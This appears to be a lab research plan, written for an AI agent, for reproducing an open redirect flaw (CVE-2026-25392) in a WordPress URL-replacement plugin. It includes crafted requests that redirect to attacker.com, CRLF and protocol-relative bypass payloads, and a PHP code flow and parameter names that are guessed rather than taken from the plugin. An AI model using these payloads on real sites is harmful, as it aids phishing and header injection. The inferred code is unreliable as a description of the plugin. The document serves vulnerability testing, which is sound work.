Update URLs – Quick and Easy way to search old links and replace them with new links in WordPress <= 1.4.1 - Unauthenticated Open Redirect

This research plan targets CVE-2026-25392, an unauthenticated open redirect vulnerability in the Search & Replace Everything – Quick and Easy Way to Find and Replace Text, Links (Update URLs) plugin for WordPress.

1. Vulnerability Summary

The "Update URLs" plugin (slug: update-urls) facilitates bulk searching and replacing of links within a WordPress database. The vulnerability exists because the plugin handles a user-supplied URL in a redirection function without performing sufficient validation or using WordPress's safe redirection functions (like wp_safe_redirect). This allows an attacker to craft a URL that redirects a victim from a trusted site to a malicious external domain.

2. Attack Vector Analysis

• Endpoint: Likely a hook registered to init, wp_loaded, or an admin-post.php action.
• Parameter: A GET or POST parameter carrying the target URL (e.g., url, redirect_to, link, or path).
• Authentication: None (Unauthenticated).
• Preconditions: The plugin must be active. The attacker needs to identify the specific query parameter or action that triggers the redirect logic.

3. Code Flow (Hypothetical/Inferred)

As source files are not provided, the following flow is inferred based on standard Open Redirect patterns in similar plugins:

1. Entry Point: The plugin registers a hook in its main file or an includes file (e.g., includes/class-update-urls.php).

   // Inferred registration
   add_action('init', 'update_urls_handle_redirect');
   // OR
   add_action('admin_post_nopriv_update_urls_redirect', 'update_urls_handle_redirect');
   

2. Processing: The function update_urls_handle_redirect checks for a specific trigger parameter.

   function update_urls_handle_redirect() {
       if (isset($_GET['update_urls_redirect'])) { // Inferred parameter name
           $target = $_GET['update_urls_redirect'];
           // VULNERABILITY: No validation or use of wp_validate_redirect
           wp_redirect($target); 
           exit;
       }
   }
   

3. Sink: The wp_redirect() function is called with raw user input, facilitating a redirect to any domain.

4. Nonce Acquisition Strategy

Open Redirect vulnerabilities typically occur in features designed for navigation or link testing where nonces are often omitted to allow "clean" URLs.

• Audit Step: Search the plugin code for wp_verify_nonce or check_admin_referer near any wp_redirect or header("Location: ...") calls.
• Bypass: If a nonce is required but the handler is registered via wp_ajax_nopriv_ or admin_post_nopriv_, check if the nonce is exposed in the frontend via wp_localize_script.
• JS Variable: If localized, look for window.update_urls_params?.nonce (inferred).

5. Exploitation Strategy

Phase 1: Discovery (Finding the Sink)

The agent must first identify the parameter and hook.

1. Search for Redirects:
   grep -rnE "wp_redirect|header\s*\(\s*['\"]Location" /var/www/html/wp-content/plugins/update-urls/
2. Identify the Input: Look at the lines found. Determine which $_GET or $_POST variable is passed to the redirect function.
3. Identify the Trigger: Check if the function is wrapped in an if(isset(...)) block or registered to an admin_post action.

Phase 2: Execution

Once the parameter (e.g., url) and trigger (e.g., action=test_link) are found:

Request Example (Inferred):

GET /wp-admin/admin-post.php?action=update_urls_test_link&url=https://attacker.com HTTP/1.1
Host: target.local

Alternatively, if it's on init:

GET /?update_urls_redirect=https://attacker.com HTTP/1.1
Host: target.local

6. Test Data Setup

1. Install and activate the "Update URLs" plugin version 1.4.1.
2. No specific database content is required as this vulnerability typically resides in the redirect logic itself rather than database processing.
3. If the redirect is tied to a "Preview" feature, create a dummy post with a link to ensure the plugin's scripts are loaded (if needed for discovery).

7. Expected Results

• The server should respond with a 301 or 302 Redirect status code.
• The Location header in the HTTP response must point exactly to the external URL provided (e.g., https://attacker.com).
• Example Response:

  HTTP/1.1 302 Found
  Location: https://attacker.com
  Content-Type: text/html; charset=UTF-8
  

8. Verification Steps

1. Browser Verification: Use browser_navigate to the crafted URL and use browser_eval("window.location.href") to confirm the browser successfully moved to attacker.com.
2. HTTP Header Check: Use http_request and inspect the headers object in the response to confirm the Location header.

9. Alternative Approaches

• Protocol Bypasses: If wp_redirect is used and some validation exists, try //attacker.com (protocol-relative) or /%0d%0aLocation:%20https://attacker.com (CRLF injection if the PHP version is old/vulnerable).
• Path Traversal/Local Redirect: If external domains are blocked, test if the plugin allows redirecting to sensitive internal paths like /wp-admin/user-new.php.
• Action Search: If admin-post.php returns a 200, search the codebase for add_action( 'wp_ajax_nopriv_ to see if the redirect is handled via an AJAX callback instead.